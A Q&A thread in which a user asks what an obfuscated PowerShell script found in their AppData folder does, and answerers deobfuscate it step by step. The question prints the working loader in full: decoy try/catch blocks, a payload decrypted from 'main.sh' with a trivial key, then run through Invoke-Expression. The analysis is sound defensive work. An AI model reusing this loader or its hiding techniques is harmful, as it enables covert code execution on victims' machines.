# Windows PowerShell Malicious script

Tags: powershell, virus

I found this code in a folder into %appdata%Roaming :(
Can anybody tell me wat it does?

```
try{Get-Transaction:Test-Connection
New-WindowsImage:Register-ArgumentCompleter
Get-HgsTrace:Set-VMMigrationNetwork}catch{

$sexq="pZsvjJoFqppwjeLWZTreMIrzqZarktnOJMwsddyKhIBlweDpKblExIlrlfWkOVsb" -replace "IoG|ZsvjJ|Fqpp|jeLWZTr|MIrzqZa|ktnOJMw|ddyK|IBlw|DpKb|ExIlr|fWkOVsb";
try{Save-VM:Get-Variable
Set-RuleOption:Get-WindowsSearchSetting
Remove-PSReadLineKeyHandler:Remove-VMResourcePool}catch{}
$ILRorUyZk=Get-Process $sexq;
if ($ILRorUyZk.length -lt 2){
$uMBOKUgyzWiOSfp=@(1..16);
$HXZBX=[System.Runtime.InteropServices.Marshal]
$iuOpORc= Get-Content "main.sh"
$kvsqQjipalHpywxaPr= ConvertTo-SecureString $iuOpORc -key $uMBOKUgyzWiOSfp;
$reEFPHvZmrf = $HXZBX::SecureStringToBSTR($kvsqQjipalHpywxaPr);
try{Remove-ItemProperty:Show-WindowsDeveloperLicenseRegistration
Connect-WSMan:Confirm-SecureBootUEFI
Revoke-VMConnectAccess:Suspend-VMReplication}catch{$upd='LmzXprwH';}
$zcthAxqVWAZrzkx = $HXZBX::PtrToStringAuto($reEFPHvZmrf);
try{Move-Item:Find-Package
Update-FormatData:Invoke-Item
ForEach-Object:New-TlsSessionTicketKey}catch{}
$zcthAxqVWAZrzkx -replace "UGSttylIkwIFr" | iex;}}
```

Thank you!

Answer (score 4, accepted):

Let's see. The first `try-catch` might be obfuscation to hide from cursory examination. The catch (pun intended) is in the the `catch` block. It contains the payload, so the `try` block is intended to throw an exception.

```
$sexq="pZsvjJoFqppwjeLWZTreMIrzqZarktnOJMwsddyKhIBlweDpKblExIlrlfWkOVsb" `
  -replace "IoG|ZsvjJ|Fqpp|jeLWZTr|MIrzqZa|ktnOJMw|ddyK|IBlw|DpKb|ExIlr|fWkOVsb";
```

The variable contains obfuscated word `powershell`, which is revealed by replacing a lot of nonsense strings with nothing. There is `-replce` with search argument but not replacement argument, thus it just removes fillers `IoG, ZsvjJ...`

```
$ILRorUyZk=Get-Process $sexq;
if ($ILRorUyZk.length -lt 2){
$uMBOKUgyzWiOSfp=@(1..16);
```

Here `Get-Process` is used to find if Powershell is running. If multiple processes aren't being run, create an array containing values 1-16. This might be to avoid situations in which interactive sessions are active.

```
$HXZBX=[System.Runtime.InteropServices.Marshal]
```

Create an alias to InterOpServices' Marshal. Nothing troublesome here, legitimate use is to save in typing and reading long namespace descriptors.

```
$iuOpORc= Get-Content "main.sh"
$kvsqQjipalHpywxaPr= ConvertTo-SecureString $iuOpORc -key $uMBOKUgyzWiOSfp;
```

A file `main.sh` is read. It contains a SecureString, encrypted with key 1,2,3...,15,16.

```
$reEFPHvZmrf = $HXZBX::SecureStringToBSTR($kvsqQjipalHpywxaPr);
```

SecureString payload is converted to BSTR. This is to [decrypt the SecureString](https://stackoverflow.com/a/28353003/503046), I guess.

```
try{Remove-ItemProperty:Show-WindowsDeveloperLicenseRegistration
Connect-WSMan:Confirm-SecureBootUEFI
Revoke-VMConnectAccess:Suspend-VMReplication}catch{$upd='LmzXprwH';}
```

Another "let's hide in the catch block" that sets a variable with nonsense content. No idea why.

```
$zcthAxqVWAZrzkx = $HXZBX::PtrToStringAuto($reEFPHvZmrf);
try{Move-Item:Find-Package
Update-FormatData:Invoke-Item
ForEach-Object:New-TlsSessionTicketKey}catch{}
```

Another a step in decryption, followed by weird stuff in another `try-catch` block without obvious intent.

```
$zcthAxqVWAZrzkx -replace "UGSttylIkwIFr" | iex;}}
```

The final payload from SecureString conversion is filtered to remove obfuscation, and the result is passed for execution to `Invoke-Expression`.

To see what's the payload, do as per Jeramy's comment. Replacing variable names to a bit more descriptive:

```
$key=@(1..16)
$encryptedStr = Get-Content "main.sh"
$secString = ConvertTo-SecureString $encryptedStr -key $key
$bstrPtr = $HXZBX::SecureStringToBSTR($secString) 
$obfuscatedStr = $HXZBX::PtrToStringAuto($bstrPtr)
$obfuscatedStr -replace "UGSttylIkwIFr"
```

Comment: exactly what @vonPryz describes above. You can get more information by running your PowerShell from the same location and executing the steps: 
`$iuOpORc= Get-Content "main.sh"
$kvsqQjipalHpywxaPr= ConvertTo-SecureString $iuOpORc -key $uMBOKUgyzWiOSfp;
$reEFPHvZmrf = $HXZBX::SecureStringToBSTR($kvsqQjipalHpywxaPr);
$zcthAxqVWAZrzkx = $HXZBX::PtrToStringAuto($reEFPHvZmrf);
$zcthAxqVWAZrzkx -replace "UGSttylIkwIFr";`
This should get you the name of what they are trying to execute out of the main.sh file.

Comment: @Jeramy executing your steps I get some errors.

Comment: @Jeramy by the way main.sh contains 91.073 chars on one line

Comment: @Alessio De Feudis I forgot that Stack would collapse the the newlines in comments. There needs to be a semi after the filename: `$iuOpORc= Get-Content "main.sh";` I can't actually test it of course since I don't have the source file, but that should get it for you.